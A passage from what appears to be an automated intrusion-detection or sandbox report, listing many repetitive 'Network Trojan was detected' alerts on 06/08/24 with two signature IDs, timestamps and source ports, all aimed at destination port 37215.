          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273334
          SID:2835222
          Source Port:58086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667670
          SID:2829579
          Source Port:58752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466924
          SID:2835222
          Source Port:53086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020535
          SID:2835222
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512895
          SID:2835222
          Source Port:56410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456022
          SID:2829579
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467538
          SID:2829579
          Source Port:38200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471100
          SID:2835222
          Source Port:44028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177870
          SID:2829579
          Source Port:35866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861392
          SID:2835222
          Source Port:43316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708983
          SID:2829579
          Source Port:35510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159281
          SID:2829579
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126975
          SID:2835222
          Source Port:33834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781793
          SID:2835222
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021974
          SID:2829579
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893650
          SID:2835222
          Source Port:52468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783187
          SID:2835222
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135437
          SID:2829579
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600594
          SID:2835222
          Source Port:60924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109417
          SID:2835222
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511624
          SID:2829579
          Source Port:34588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510565
          SID:2835222
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857867
          SID:2835222
          Source Port:42306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781919
          SID:2829579
          Source Port:32936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734859
          SID:2835222
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160381
          SID:2829579
          Source Port:48416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350713
          SID:2829579
          Source Port:41794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708254
          SID:2835222
          Source Port:51708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745824
          SID:2829579
          Source Port:49932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462902
          SID:2829579
          Source Port:36146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895718
          SID:2829579
          Source Port:51792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602816
          SID:2829579
          Source Port:54872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512895
          SID:2829579
          Source Port:34516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810190
          SID:2835222
          Source Port:49764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260672
          SID:2829579
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729603
          SID:2829579
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461438
          SID:2829579
          Source Port:58190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735026
          SID:2835222
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128916
          SID:2835222
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466020
          SID:2829579
          Source Port:42372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.914391
          SID:2835222
          Source Port:50714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861962
          SID:2835222
          Source Port:43784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806872
          SID:2835222
          Source Port:45654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238610
          SID:2835222
          Source Port:57254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604947
          SID:2829579
          Source Port:42076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271282
          SID:2835222
          Source Port:59698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.455391
          SID:2835222
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782743
          SID:2829579
          Source Port:38004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792841
          SID:2829579
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466218
          SID:2829579
          Source Port:34142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.119115
          SID:2829579
          Source Port:33558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449834
          SID:2829579
          Source Port:39906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037983
          SID:2835222
          Source Port:60782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791550
          SID:2835222
          Source Port:40296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732650
          SID:2829579
          Source Port:50558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240569
          SID:2829579
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675064
          SID:2829579
          Source Port:50984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110033
          SID:2829579
          Source Port:34912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709941
          SID:2829579
          Source Port:58966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178425
          SID:2835222
          Source Port:49424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178590
          SID:2835222
          Source Port:35136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466066
          SID:2829579
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262251
          SID:2829579
          Source Port:44580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460805
          SID:2835222
          Source Port:41434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353233
          SID:2829579
          Source Port:38468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781043
          SID:2835222
          Source Port:54830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730952
          SID:2829579
          Source Port:59260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017677
          SID:2835222
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729839
          SID:2835222
          Source Port:36228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350862
          SID:2835222
          Source Port:60810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513901
          SID:2835222
          Source Port:44390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035079
          SID:2835222
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731429
          SID:2829579
          Source Port:49868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511516
          SID:2829579
          Source Port:45708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273616
          SID:2835222
          Source Port:35812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306153
          SID:2835222
          Source Port:49166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272638
          SID:2829579
          Source Port:55470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448498
          SID:2835222
          Source Port:53022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162549
          SID:2829579
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038150
          SID:2835222
          Source Port:41846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738808
          SID:2835222
          Source Port:57466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901484
          SID:2829579
          Source Port:57002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449569
          SID:2829579
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112262
          SID:2829579
          Source Port:40162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040564
          SID:2835222
          Source Port:44832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895966
          SID:2829579
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599814
          SID:2835222
          Source Port:46342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859478
          SID:2835222
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461976
          SID:2829579
          Source Port:42380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601307
          SID:2835222
          Source Port:34964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837343
          SID:2835222
          Source Port:60776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912668
          SID:2835222
          Source Port:37660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514646
          SID:2829579
          Source Port:60398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099477
          SID:2829579
          Source Port:44588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241436
          SID:2829579
          Source Port:56768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467399
          SID:2829579
          Source Port:48154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299660
          SID:2835222
          Source Port:60558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709544
          SID:2829579
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461377
          SID:2835222
          Source Port:52842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798314
          SID:2829579
          Source Port:38494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744666
          SID:2835222
          Source Port:56430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730441
          SID:2829579
          Source Port:56894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786895
          SID:2835222
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741566
          SID:2829579
          Source Port:53538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158897
          SID:2829579
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150249
          SID:2835222
          Source Port:53612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801083
          SID:2835222
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461016
          SID:2835222
          Source Port:42988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468677
          SID:2829579
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.814139
          SID:2829579
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822810
          SID:2835222
          Source Port:50078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040470
          SID:2835222
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787742
          SID:2829579
          Source Port:54670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896775
          SID:2829579
          Source Port:57838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236100
          SID:2835222
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184003
          SID:2835222
          Source Port:59436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179956
          SID:2835222
          Source Port:57466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550693
          SID:2835222
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043520
          SID:2835222
          Source Port:33156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601731
          SID:2829579
          Source Port:42758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042373
          SID:2829579
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601271
          SID:2835222
          Source Port:43324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191824
          SID:2835222
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704471
          SID:2829579
          Source Port:58536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176956
          SID:2829579
          Source Port:41554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859967
          SID:2835222
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512022
          SID:2835222
          Source Port:56438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160552
          SID:2835222
          Source Port:33770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043539
          SID:2835222
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394504
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788209
          SID:2829579
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842221
          SID:2829579
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262060
          SID:2835222
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470374
          SID:2835222
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732363
          SID:2835222
          Source Port:32880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128032
          SID:2835222
          Source Port:46274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274528
          SID:2829579
          Source Port:38810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018636
          SID:2835222
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894609
          SID:2835222
          Source Port:41592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550864
          SID:2829579
          Source Port:38452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741493
          SID:2835222
          Source Port:45312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897080
          SID:2835222
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161582
          SID:2829579
          Source Port:38486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260846
          SID:2829579
          Source Port:46270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239701
          SID:2829579
          Source Port:48754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796349
          SID:2835222
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175552
          SID:2829579
          Source Port:44426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015069
          SID:2835222
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114065
          SID:2829579
          Source Port:49346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.739795
          SID:2835222
          Source Port:37110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892495
          SID:2835222
          Source Port:41028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510822
          SID:2829579
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546557
          SID:2829579
          Source Port:52536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708338
          SID:2835222
          Source Port:36898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157116
          SID:2829579
          Source Port:53180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604796
          SID:2829579
          Source Port:49442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746681
          SID:2835222
          Source Port:58900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461395
          SID:2835222
          Source Port:35794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861122
          SID:2835222
          Source Port:51516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270357
          SID:2829579
          Source Port:48214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787047
          SID:2829579
          Source Port:51374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160338
          SID:2829579
          Source Port:50244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732605
          SID:2829579
          Source Port:43220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784410
          SID:2835222
          Source Port:45914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152333
          SID:2829579
          Source Port:58572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462462
          SID:2829579
          Source Port:56252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857690
          SID:2829579
          Source Port:45536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744917
          SID:2835222
          Source Port:48136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600487
          SID:2829579
          Source Port:46400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016986
          SID:2829579
          Source Port:45216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022233
          SID:2835222
          Source Port:34338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160678
          SID:2829579
          Source Port:40884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462651
          SID:2829579
          Source Port:47190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855032
          SID:2835222
          Source Port:49496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449602
          SID:2835222
          Source Port:38064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260649
          SID:2835222
          Source Port:34870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601576
          SID:2835222
          Source Port:43366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800771
          SID:2835222
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258610
          SID:2829579
          Source Port:35750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178624
          SID:2835222
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191858
          SID:2835222
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403951
          SID:2829579
          Source Port:55220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111174
          SID:2835222
          Source Port:36420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782704
          SID:2835222
          Source Port:44428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669654
          SID:2829579
          Source Port:43968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742968
          SID:2835222
          Source Port:42652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241116
          SID:2835222
          Source Port:44184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111967
          SID:2835222
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741996
          SID:2835222
          Source Port:36458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127398
          SID:2829579
          Source Port:51670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783402
          SID:2835222
          Source Port:35118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709884
          SID:2829579
          Source Port:45304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793404
          SID:2835222
          Source Port:48942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264110
          SID:2835222
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791787
          SID:2835222
          Source Port:44566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174849
          SID:2829579
          Source Port:38798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811029
          SID:2835222
          Source Port:36166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
